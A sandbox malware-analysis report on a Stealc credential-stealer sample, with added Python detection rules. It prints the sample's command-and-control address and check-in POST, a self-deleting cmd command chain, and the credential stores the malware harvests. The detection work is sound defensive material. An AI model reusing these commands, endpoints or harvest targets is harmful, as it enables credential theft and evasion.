                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04853D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_04853D67
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04841977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_04841977
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0484FA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0484FA17
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_04854A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_04854A27
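                      The decrypted strings earlier in the report (the freebl3/mozglue/nss3/softokn3/sqlite3 DLL names, the "/c timeout /t 5 & del /f /q" and "del C:\ProgramData\*.dll" self-delete fragments, and the Discord, Telegram Desktop, Steam and Pidgin paths) together with the FindFirstFileA/CopyFileA/DeleteFileA collection loops listed above map directly onto host telemetry. The following Python is an added example, not part of the Joe Sandbox report, that runs three such rules over constructed Sysmon-style events. The event field names, the sample paths and the choice of C:\ProgramData as the DLL staging directory (inferred from the self-delete command, not recorded by the run) are assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List

# DLL names taken from the decrypted strings. The self-delete command removes
# C:\ProgramData\*.dll, so that directory is assumed here to be where they are staged.
STAGED_DLLS = {"freebl3.dll", "mozglue.dll", "msvcp140.dll", "nss3.dll",
               "softokn3.dll", "vcruntime140.dll", "sqlite3.dll"}
STAGING_DIR = "c:\\programdata\\"

# Self-delete command line assembled from the decrypted fragments
#   '/c timeout /t 5 & del /f /q "'   and   '" & del "C:\ProgramData\*.dll"" & exit'
SELF_DELETE_RE = re.compile(
    r'/c\s+timeout\s+/t\s+\d+\s*&\s*del\s+/f\s+/q\s+"[^"]+"\s*&\s*del\s+"C:\\ProgramData\\\*\.dll"',
    re.IGNORECASE)

# Stores the collection loops walk (from the strings) and the image that legitimately
# owns each one; any other image reading them is reported.
HARVEST_TARGETS = [
    ("\\discord\\local storage\\leveldb", "discord.exe"),
    ("\\telegram desktop\\", "telegram.exe"),
    ("\\steam\\config\\", "steam.exe"),
    ("\\.purple\\accounts.xml", "pidgin.exe"),
]

# Constructed Sysmon-style events for the demonstration (not from the report).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event": "FileCreate", "pid": "1436", "image": r"C:\Users\user\Desktop\lxEu3xfjIb.exe",
     "target": r"C:\ProgramData\freebl3.dll"},
    {"event": "FileCreate", "pid": "1436", "image": r"C:\Users\user\Desktop\lxEu3xfjIb.exe",
     "target": r"C:\ProgramData\mozglue.dll"},
    {"event": "FileCreate", "pid": "1436", "image": r"C:\Users\user\Desktop\lxEu3xfjIb.exe",
     "target": r"C:\ProgramData\nss3.dll"},
    {"event": "FileCreate", "pid": "1436", "image": r"C:\Users\user\Desktop\lxEu3xfjIb.exe",
     "target": r"C:\ProgramData\softokn3.dll"},
    {"event": "FileRead", "pid": "1436", "image": r"C:\Users\user\Desktop\lxEu3xfjIb.exe",
     "target": r"C:\Users\user\AppData\Roaming\discord\Local Storage\leveldb\000003.log"},
    # The owning application touching its own store must not fire.
    {"event": "FileRead", "pid": "3320", "image": r"C:\Users\user\AppData\Local\Discord\app-1.0.9\Discord.exe",
     "target": r"C:\Users\user\AppData\Roaming\discord\Local Storage\leveldb\CURRENT"},
    {"event": "FileRead", "pid": "1436", "image": r"C:\Users\user\Desktop\lxEu3xfjIb.exe",
     "target": r"C:\Users\user\AppData\Roaming\Telegram Desktop\tdata\key_datas"},
    {"event": "ProcessCreate", "pid": "2100", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": 'cmd.exe /c dir C:\\Users\\user'},
    {"event": "ProcessCreate", "pid": "2208", "parent_pid": "1436", "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\lxEu3xfjIb.exe" & del "C:\ProgramData\*.dll"" & exit'},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_stealc(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply the three rules in log order; returns one finding per hit."""
    findings: List[Dict[str, str]] = []
    staged: Dict[str, set] = defaultdict(set)   # pid -> staged DLL names seen so far
    for ev in events:
        pid, image, kind = ev["pid"], _basename(ev.get("image", "")), ev["event"]
        if kind == "ProcessCreate" and image == "cmd.exe" and SELF_DELETE_RE.search(ev.get("cmdline", "")):
            findings.append({"pid": pid, "rule": "self_delete", "detail": ev["cmdline"]})
        elif kind == "FileCreate":
            target = ev["target"].lower()
            if target.startswith(STAGING_DIR) and _basename(target) in STAGED_DLLS:
                staged[pid].add(_basename(target))
                if len(staged[pid]) == 3:   # fire once, on the third distinct DLL
                    findings.append({"pid": pid, "rule": "nss_dll_staging",
                                     "detail": ", ".join(sorted(staged[pid]))})
        elif kind == "FileRead":
            target = ev["target"].lower()
            for fragment, owner in HARVEST_TARGETS:
                if fragment in target and image != owner:
                    findings.append({"pid": pid, "rule": "credential_store_access", "detail": ev["target"]})
                    break
    return findings


if __name__ == "__main__":
    for hit in detect_stealc(SAMPLE_EVENTS):
        print(hit["pid"], hit["rule"], hit["detail"])
```

                      The staging rule waits for three distinct DLLs from the set so that a single vcruntime140.dll or msvcp140.dll drop by an installer does not fire; the self-delete rule keys on the timeout/del/del chain rather than on the file name, since the first del argument is the stealer's own path and changes per sample.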

                      Networking

                      barindex
                      Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 95.215.207.176:80
                      Source: Malware configuration extractor | URLs: http://95.215.207.176/d8ddb681db736e16.php
                      Source: global traffic | HTTP traffic detected:
                          GET / HTTP/1.1
                          Host: 95.215.207.176
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                      Source: global traffic | HTTP traffic detected:
                          POST /d8ddb681db736e16.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
                          Host: 95.215.207.176
                          Content-Length: 216
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 31 33 30 45 44 38 43 45 33 42 33 34 37 36 35 32 32 35 30 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a
                          Data Ascii (line breaks restored from the CRLFs in the raw bytes):
                              ------BGDAAKJJDAAKFHJKJKFC
                              Content-Disposition: form-data; name="hwid"

                              5130ED8CE3B3476522507
                              ------BGDAAKJJDAAKFHJKJKFC
                              Content-Disposition: form-data; name="build"

                              LogsDiller
                              ------BGDAAKJJDAAKFHJKJKFC--
                      Source: Joe Sandbox View | ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
                      Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:49720
                      Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.5:59725
                      Source: unknown | TCP traffic detected without corresponding DNS query: 95.215.207.176 (reported 8 times, one per connection)
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_004048D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_004048D0
                      Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 to Host 95.215.207.176 (same request as listed above)
                      Source: unknown | HTTP traffic detected: POST /d8ddb681db736e16.php HTTP/1.1 to Host 95.215.207.176, Content-Length 216 (same hwid/build registration request as listed above)
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002C99000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/$
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CF5000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CC4000.00000004.00000020.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/d8ddb681db736e16.php
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/d8ddb681db736e16.php&
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/d8ddb681db736e16.php:
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpH
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpS
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpV
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/d8ddb681db736e16.phpf
                      Source: lxEu3xfjIb.exe, 00000000.00000002.2288542652.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://95.215.207.176/ws
                      Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
                      Source: lxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop | 0_2_00409E30
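                      The only C2 exchange the capture contains is the initial GET / and the hwid/build registration POST above; the decrypted strings also name token, file_name, file and message fields for later uploads, but those were not observed (the report records WerFault.exe being launched for the sample's process, so the run did not get that far). Note also that the two CVE-2016-2211 Suricata alerts concern a different peer (20.109.210.53:443, TLS) and are corroborated by nothing else on this page, whereas the Stealc check-in alert agrees with the configuration extractor and the captured HTTP. The following Python is an added example, not part of the report: it decodes the captured Data Raw bytes, parses the multipart form, shows that the hwid value follows the decrypted format string %08lX%04lX%lu (8 hex digits, 4 hex digits, then a decimal), and applies a heuristic for the registration shape. The benign upload used as a counter-example is constructed.

```python
import re
from typing import Dict, Optional, Tuple

# Request captured by the sandbox: the "Data Raw" hex of the POST to /d8ddb681db736e16.php,
# copied from the report (bytes.fromhex skips the whitespace), and the Content-Type it carried.
CAPTURED_CONTENT_TYPE = "multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC"
CAPTURED_BODY_HEX = """
2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b
20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
35 31 33 30 45 44 38 43 45 33 42 33 34 37 36 35 32 32 35 30 37 0d 0a
2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b
20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a
4c 6f 67 73 44 69 6c 6c 65 72 0d 0a
2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 2d 2d 0d 0a
"""

# Alphabet from the decrypted strings, used by the sample for the random boundary.
BOUNDARY_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890")
# Decrypted HWID format string "%08lX%04lX%lu": 8 hex digits, 4 hex digits, decimal.
HWID_RE = re.compile(r"^([0-9A-F]{8})([0-9A-F]{4})([0-9]{1,10})$")

# Constructed benign browser upload for comparison (not from the report).
BENIGN_CONTENT_TYPE = "multipart/form-data; boundary=----WebKitFormBoundaryabc"
BENIGN_BODY = (b"------WebKitFormBoundaryabc\r\n"
               b'Content-Disposition: form-data; name="file"; filename="a.txt"\r\n'
               b"Content-Type: text/plain\r\n\r\nhello\r\n"
               b"------WebKitFormBoundaryabc--\r\n")


def parse_multipart(body: bytes, content_type: str) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser: {field name: value bytes}."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if m is None:
        raise ValueError("no boundary in Content-Type")
    delimiter = b"--" + m.group(1).encode("ascii")
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter):
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                      # preamble, epilogue or the closing "--"
            continue
        name = re.search(rb'name="([^"]*)"', head)
        if name is None:
            continue
        fields[name.group(1).decode("latin-1")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def captured_checkin() -> Dict[str, bytes]:
    """Fields of the registration request recorded in the report."""
    return parse_multipart(bytes.fromhex(CAPTURED_BODY_HEX), CAPTURED_CONTENT_TYPE)


def split_hwid(hwid: str) -> Optional[Tuple[int, int, int]]:
    """Split a %08lX%04lX%lu-formatted HWID into its three numeric components."""
    m = HWID_RE.match(hwid)
    if m is None:
        return None
    return int(m.group(1), 16), int(m.group(2), 16), int(m.group(3))


def is_stealc_checkin(method: str, headers: Dict[str, str], body: bytes) -> bool:
    """Heuristic for the first beacon: multipart POST carrying exactly hwid and build,
    an upper-case/digit boundary after the fixed '----' prefix, and a well-formed hwid."""
    if method.upper() != "POST":
        return False
    ctype = headers.get("Content-Type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if not ctype.startswith("multipart/form-data") or m is None:
        return False
    boundary = m.group(1)
    if not boundary.startswith("----") or not set(boundary[4:]) <= BOUNDARY_ALPHABET:
        return False
    fields = parse_multipart(body, ctype)
    if set(fields) != {"hwid", "build"}:
        return False
    return split_hwid(fields["hwid"].decode("latin-1", "replace")) is not None


if __name__ == "__main__":
    fields = captured_checkin()
    print(fields, split_hwid(fields["hwid"].decode()))
    print(is_stealc_checkin("POST", {"Content-Type": CAPTURED_CONTENT_TYPE}, bytes.fromhex(CAPTURED_BODY_HEX)))
    print(is_stealc_checkin("POST", {"Content-Type": BENIGN_CONTENT_TYPE}, BENIGN_BODY))
```

                      The 216-byte body the parser decodes matches the Content-Length in the capture, and the hwid splits as 5130ED8C / E3B3 / 476522507, which is what the %08lX%04lX%lu format string predicts; the build name LogsDiller is the second field and is what a responder would pivot on across samples.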

                      System Summary

                      barindex
                      Source: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0487F4FF0_2_0487F4FF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0487159F0_2_0487159F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0489A5FF0_2_0489A5FF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048836EF0_2_048836EF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048CA76F0_2_048CA76F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048BA08F0_2_048BA08F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048A80400_2_048A8040
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048AA19F0_2_048AA19F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0489B1CF0_2_0489B1CF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048711DF0_2_048711DF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048882DF0_2_048882DF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048B134F0_2_048B134F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048B5C000_2_048B5C00
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0489AD0F0_2_0489AD0F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048AED3D0_2_048AED3D
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048AFFEF0_2_048AFFEF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048BC8050_2_048BC805
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_0486D9AB0_2_0486D9AB
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048B9AAF0_2_048B9AAF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_048ACA0F0_2_048ACA0F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04883A0F0_2_04883A0F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_04885B2F0_2_04885B2F
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_048C8B64
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: String function: 00404610 appears 317 times
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052
                      Source: lxEu3xfjIb.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 00000000.00000002.2288500521.0000000002C23000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c | reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f | reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: lxEu3xfjIb.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@0/1
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Y3JRHVM0.htm
                      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1436
                      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d3086a13-7b52-44cc-b9c5-e403a51bfe22
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\lxEu3xfjIb.exe "C:\Users\user\Desktop\lxEu3xfjIb.exe"
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: msimg32.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: msvcr100.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: rstrtmgr.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: Binary string: my_library.pdbU | source: lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: my_library.pdb | source: lxEu3xfjIb.exe, lxEu3xfjIb.exe, 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, lxEu3xfjIb.exe, 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, lxEu3xfjIb.exe, 00000000.00000003.2088127603.0000000004920000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Unpacked PE file: 0.2.lxEu3xfjIb.exe.400000.0.unpack | section rights on disk vs unpacked: .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Unpacked PE file: 0.2.lxEu3xfjIb.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_02C25A3D push 7D7C6160h; retf 0_2_02C25A42
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_02C233F4 push cs; retn 0002h 0_2_02C2340E
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_02C2310D push cs; retn 0002h 0_2_02C2310E
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_02C23117 push cs; retn 0002h 0_2_02C23126
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_0485B59C push ecx; ret 0_2_0485B5AF
                      Source: C:\Users\user\Desktop\lxEu3xfjIb.exe | Code function: 0_2_048C9280 push ecx; ret 0_2_048C9293
